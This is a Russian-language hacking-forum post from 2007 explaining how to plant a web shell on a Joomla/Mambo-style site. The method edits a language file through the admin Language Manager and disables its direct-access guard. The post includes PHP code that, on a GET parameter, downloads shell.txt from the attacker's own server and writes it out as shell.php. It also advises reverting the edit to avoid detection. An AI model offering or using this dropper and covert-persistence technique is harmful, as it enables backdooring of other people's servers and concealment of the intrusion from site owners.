08.12.2007, 01:02
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):
заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру:
z:/home/test1.ru/www/ language/english.php
он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек):
PHP код:
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
Экранируем эту строчку и дописываем подарок:
PHP код:
if($HTTP_GET_VARS['a']==1)
{
$file = file('http://адрес твоего сайта с шеллом/shell.txt');
$file2 = fopen("shell.php", "w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта
for ($i = 0; $i < count($file); $i++)
{
fputs($file2, $file[$i]);
}
fclose($file2);
}
// no direct access
//defined( '_VALID_MOS' ) or die( 'Restricted access' );
Дальше переходим по линке:
http://test1.ru/ language/english.php?a=1
И получаем шелл:
http://test1.ru/language/shell.php
P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд.
Последний раз редактировалось Grey; 08.12.2007 в 01:05..
|
|
|